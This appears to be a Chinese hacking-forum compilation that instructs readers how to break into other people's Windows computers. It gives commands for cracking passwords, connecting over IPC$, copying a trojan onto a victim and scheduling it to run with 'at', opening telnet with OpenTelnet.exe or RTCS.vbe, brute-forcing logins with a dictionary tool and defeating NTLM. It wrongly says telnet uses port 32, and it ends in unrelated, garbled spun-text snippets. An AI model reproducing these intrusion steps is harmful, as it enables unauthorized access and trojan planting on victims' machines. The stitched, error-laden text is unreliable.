进入ROMMON模式,先初始化然后改软件名称,这样就可以跳过密码了。记住,进入交换机之后再把软件改过来
兄弟,用软件,下载opentelnet.exe,然后放在C:\Documents and Settings\Administrator目录下,然后可以用cmd下命令OpenTelnet.exe \\对方ip地址 administrator "对方密码" 1 90 就可以连接了。前提是你要知道对方ip和对方计算机的密码,密码可以下载流光5.0去破解。如果连接成功就开辟了对方计算机90号端口。然后telnet 对方ip 90 就连接上去了。这样就可以用tftp命令往里面传木马了。
下面还有一个方法,用流光5.0探到对方密码后
net use \\对方ip\ipc$ "对方密码" /user:"administrator" 建立连接
net time \\对方IP 查看对方当前时间
把木马放在C:\Documents and Settings\Administrator下 然后 copy 木马名称 \\对方ip\c 即将当前目录下的文件复制到对方c盘内
at \\对方ip 时间 木马名 在什么时间运行木马,一般在查看了对方时间后晚3分钟运行。
这样到了时间后,恭喜,你就可以用自己的木马控制端口查看对方了。
就简单说下了,有什么不懂的再来问我,我保证会把你培养成一流的黑客的。
还有,opentelnet.exe和流光5.0必须下载,这是居家旅行,杀人灭口必备良药!
talnet 登录和Windows登录一样,需要确认用户名与密码。
如果你有电脑功底可以试下从135端口扫对方服务,如果有开启服务可以用工具扫对方的空密码和弱密码账号。一般意识不好的用户都用123456和空密码就是没密码的账号,为了方便开机。还有网吧的账号除了管理机之外客服机的密码都是一置的,如果攻破一台都是整个网吧
telnet都是明文传输数据的,你只要截取到报文就行了,通常telnet用的是固定的32号端口。
进行截取报文的软件,通常称为协议分析软件,国产的有科来软件(有免费版的),用它来监视32号端口的字节数据,并用ASCII进行解码。
这类软件理论上安装在数据传送路径中的任何一台电脑上都可以截取到报文,但前提是必需有人或物发送了这些报文。
还有一种暴力破解如下:
首先启动 LetMeIn! V1.0, 我们先假设在 nowhere.unix.net 中有一个帐号叫作 guest
使用的密码为 guest003, 且我们有一个 dic.txt 档案, 内含有字典档, 其内容为:
-----Cut here DIC.TXT ------
guest001
guest002
guest003
guest004
----- End of DIC.TXT -------
我们先了解一下 Telnet连线到 nowhere.unix.net 中的情况是如何回应的, 先启动我
们的 Telnet 软体, Telnet nowhere.unix.net 中:
ms.hinet.net telnet nowhere.unix.net (Telnet 试试看....)
Trying 111.222.255.255...
Connected to nowhere.unix.net
Escape character is ^].
Digital UNIX (nowhere.unix.net) (ttypa)
login: guest
Password:
Login incorrect
login: guest
Password:
Login incorrect
嗯, 试了两次之後断线吧! 因为我们已经知道要如何设定 LetMeIn! 了, 首先在 Setu
Keys 中输入帐号名称, 也就是我们所要破解的 guest~, 为甚麽在帐号名称後要加上
一个 ~ 字元呢?? 因为我们要模拟输入帐号後的 Enter 键, 我们要使用字典档破解,
所以接着选 Use Password File To Find.... ê一个选项, 再按下 Select file 选择
我们预先准备好的字典档 "DIC.TXT", After Key 中只要输入 ~ 即可, 也是用来模拟
Enter 键用的! 在 Delay 中设定为 8 秒, Pass Delay 2 秒不动, 接着启动你的 Telnet
软体, 先 Telnet 到 nowhere.unix.net, 回到 LetMeIn! 中按下 Start Break 键後在
8 秒内将焦点转到 Telnet 软体中, 开始破解:
ms.hinet.net telnet nowhere.unix.net (先 Telnet)
Trying 111.222.255.255...
Connected to nowhere.unix.net
Escape character is ^].
Digital UNIX (nowhere.unix.net) (ttypa)
(焦点转回, 底下为 LetMeIn! 自动输入....)
login: guest
Password: (输入了 guest001)
Login incorrect
login: guest
Password: (输入了 guest001)
Login incorrect
login: guest
Password: (输入了 guest003)
Welcome to nowhere.unix.net, Guest login succ....(略)
成功了! 请回到 LetMeIn! 中选择 Stop Break 开始使用 guest 这个帐号吧!!
LetMeIn! 1.0 本身并没有支援自动 Telnet 破解, 所以必需要您使用一般的 Telnet
程式来作破解的工作, 基於这个原因, James 目前正在改写的 LetMeIn! V2.0 将会
支援 PPP 连线的 Telnet 破解, 并可能会多一个 Mail Password 的功能, 你可以随便
将它放在一台机器上跑, 设定你的 Mail Address, 在找到後会 Mail Password 给你!
不过一切要等 LetMeIn! 2.0 正式 Release 才知道啦~~~~
LetMeIn! V1.0 的功能仅作为自动输入, 所以用来破解帐号的能力并不强, 但是如果你
没有办法抓到 /etc/passwd 的话, 也只能用这个方法了, 如果你用 ClayMore 来作这
样的动作, 你会发觉在网路频宽不ì的情况之下, LetMeIn! 的 Pass Delay 功能变得
非常有用, 而 ClayMore 却不能在这种情况之下作任何的 Delay.. 也没有甚麽用处了!
LetMeIn! 虽然有其用处, 不过在 Crack Password 上还是没有直接抓 etc/passwd 再
Crack Jack 快! 不过如果系统真没有一点漏洞, 还是只有这个方式可行
首先需要说明一点的就是:如果从破解密码的角度上讲的话,那可绝对不是一件容易的事情!因为首先必须要学习、并且精通很多的数学知识。例如:计算机密码编码学与网络安全、组合数学、高等数学等专业知识,然后还必须要精通:计算机操作系统内部结构、计算机操作系统的底层结构、计算机网络原理及其相关的编程技术,只有这样,你才有可能破解密码。
Win2000的Telnet服务
其实从应用层面上,Win2000的Telnet服务并没有什么可说的,绝大部分内容你都可以从HELP文件中得到,我在此只是把它稍微整理一下而已。
1 基本配置
Win2000为我们提供了Telnet客户机和服务器程序:Telnet.exe是客户机程序(Client),tlntsvr.exe是服务器程序(server),同时它还为我们提供了Telnet服务器管理程序tlntadmn.exe。
Windows 2000 默认安装了 Telnet 服务,但是并没有默认启动。下面给出HELP文件中 Telnet 服务的一部分默认设置:
AllowTrustedDomain:是否允许域用户访问。默认值是1,允许信任域用户访问。可以改为0: 不允许域用户访问(只允许本地用户)。
DefaultDomain:可以对与该计算机具有信任关系的任何域设置。默认值是"."。
DefaultShell:显示 shell 安装的路径位置。默认值是: %systemroot%\System32\Cmd.exe /q /k
MaxFailedLogins:在连接终止之前显示尝试登录失败的最大次数。默认是3。
LoginScript:显示 Telnet 服务器登录脚本的路径位置。默认的位置就是“%systemroot%\System32\login.cmd”,你可以更改脚本内容,这样登录进Telnet的欢迎屏幕就不一样了。
NTLM:NTLM身份验证选项。默认是2。可以有下面这些值:
0: 不使用 NTLM 身份验证。
1: 先尝试 NTLM 身份验证,如果失败,再使用用户名和密码。
2: 只使用 NTLM 身份验证。
TelnetPort:显示 telnet 服务器侦听 telnet 请求的端口。默认是:23。你也可以更改为其他端口。
以上各项设置你可以使用tlntadmn.exe(Telnet服务器管理程序)来进行非常方便的配置,配置后需要重新启动Telnet服务。如图1
2 NTLM
提到了telnet就不能不提NTLM,我想这也是让入侵者最为头痛的一件事,哪怕你获得了管理员帐号和密码,想简单通过NTLM也并非易事,况且win2000中的telnet默认仅以NTLM方式验证身份,这就让我们不得不关注NTLM这个东东,那么什么是NTLM呢?
早期的SMB协议在网络上明文传输口令,后来出现了"LAN Manager Challenge/Response"验证机制,简称LM,它十分简单以至很容易被破解,微软随后提出了WindowsNT挑战/响应验证机制,即NTLM。现在已经有了更新的NTLMv2以及Kerberos验证体系。NTLM工作流程是这样的:
1、客户端首先在本地加密当前用户的密码成为密码散列
2、客户端向服务器发送自己的帐号,这个帐号是没有经过加密的,明文直接传输
3、服务器产生一个16位的随机数字发送给客户端,作为一个 challenge(挑战)
4、客户端再用加密后的密码散列来加密这个 challenge ,然后把这个返回给服务器。作为 response(响应)
5、服务器把用户名、给客户端的challenge 、客户端返回的 response 这三个东西,发送域控制器
6、域控制器用这个用户名在 SAM密码管理库中找到这个用户的密码散列,然后使用这个密码散列来加密 challenge。
7、域控制器比较两次加密的 challenge ,如果一样,那么认证成功。
从上面的过程我们可以看出,NTLM是以当前用户的身份向Telnet服务器发送登录请求的,而不是用你扫到的对方管理员的帐户和密码登录,显然,你的登录将会失败。举个例子来说,你家的机器名为A(本地机器),你入侵的机器名为B(远地机器),你在A上的帐户是xinxin,密码是1234,你扫到B的管理员帐号是Administrator,密码是5678,当你想Telnet到B时,NTLM将自动以当前用户的帐号和密码作为登录的凭据来进行上面的7项操作,即用xinxin和1234,而并非用你扫到的Administrator和5678,且这些都是自动完成的,根本不给你插手的机会,因此你的登录操作将失败。
由于Telnet服务器对NTLM的使用有3个选项,所以当你Telnet远地机器时,会显示下面情况中的一种:
1)身份验证选项=0时
=====================================
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:
\\为0时不使用NTML身份验证,直接输入用户名和密码,比如你可以输入扫到的Administrator和5678
2)身份验证选项=1时
=====================================
NTLM Authentication failed due to insufficient credentials. Please login withclear text username and password
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:
\\先尝试 NTLM 身份验证,如果失败,再使用用户名和密码,其实这种方式对于我们来说,与上一种方式没什么区别
3)身份验证选项=2时
=====================================
NTLM Authentication failed due to insufficient credentials. Please login withclear text username and password
Server allows NTLM authentication only
Server has closed connection
遗失对主机的连接。
C:\
\\仔细看看上面的显示,根本没有给你输入用户名和密码的机会,直接断开连接,扫到了密码也是白扫
所以对于入侵者来说,NTLM是横在我们面前的一座大山,必须要除掉它,一般我们有如下几种方法:
1通过修改远程注册表更改telnet服务器配置,将验证方式从2改为1或0;
2使用NTLM.exe,上传后直接运行,可将telnet服务器验证方式从2改为1;
3在本地建立扫描到的用户,以此用户身份开启telnet客户机并进行远程登录;
4使用软件,比如opentelnet.exe(需要管理员权限且开启IPC管道)
5使用脚本,如RTCS,(需要管理员权限但不依赖IPC管道)
基本上是以上的5种,其中后两种是我们比较常用的开telnet的手法,而且使用方法十分简单,命令如下:
OpenTelnet.exe \\server username password NTLMAuthor telnetport
OpenTelnet.exe \\服务器地址 管理员用户名 密码 验证方式(填0或1) telnet端口
cscript RTCS.vbe targetIP username password NTLMAuthor telnetport
cscript RTCS.vbe 目标IP 管理员用户名 密码 验证方式 tlnet端口
天下 的自考英语两试题皆是雷同 的吗尔念 晓得详细 的相闭事宜,无关测验 的,便是要考白话 甚么的吗?借有易没有易。0 八年 一0月自考英语两测验 试题及参照谜底 ( 二00 八- 一0- 二 七 0 一:0 三:0 二) 标签:0 八年 一0月 自考 试题 谜底 学育 1、双选题: 一、It...
剧情吧工夫 : 二0 一 四- 一0- 二 三 一 五: 二 四: 二 四 闪电侠第一季第 一散剧情先容 被闪电击外的超才能 者。 Barry Allen是一个很心爱的小男孩,已经的他也领有一个幸祸完善 的野庭。但是 正在他十一岁的时刻 ,从天而降的劫难 让他的野庭分崩离析 ,她的母...
后台真体类代码以下: 一 二 三 四 五 六 七 八 九 一0 一 一 一 二 一 三 一 四 一 五 一 六 一 七 一 八 一 九 二0 二 一 二 二 二 三 二 四 二 五 二 六 二 七 二 八 二 九 三0 三 一 三 二 三 三 三 四 三 五/*** @author 直健磊* @da...
收集 二0 二0- 一0- 二 七 0 二:0 九: 五 一 五 二年夜 野皆 晓得,事宜 营销正在各年夜 品牌脚上皆玩患上特殊 六。尤为是互联网私司,正在事宜 营销上的弄法 否谓是层见叠出让人目眩 纷乱 。而房天产那个止业便十分特殊,岂论 是由于 止业配景 ,照样 业内的规矩 限定 ,房天产的...
跟着 互联网正在外国快要 二0年的成长 ,内容范畴 也从本去傻年夜 乌精的拼流质,入进了垂曲范畴 的粗根细做时期 。尔信任 许多 作过互联网经营的小同伴 ,必然 打仗 过内容经营,或者者博职作内容经营。然则 ,许多 自以为作了良久 内容经营的小同伴 ,其真仅仅一个“文字编纂 ”罢了 ,为何必修 ...
甚么文献合适 用CDN添载CDN次要实用 于一点儿动态资本 文献的添载,好比 javascript文献、css样式文献、字体、图片、望频等其余资本 文献。那些文献咱们每每 搁到本身 的一点儿前端办事 器外作处置 (nginx),运用CDN便否以避免除了前端办事 器部门 事情 了。运用CDN的利益 晋...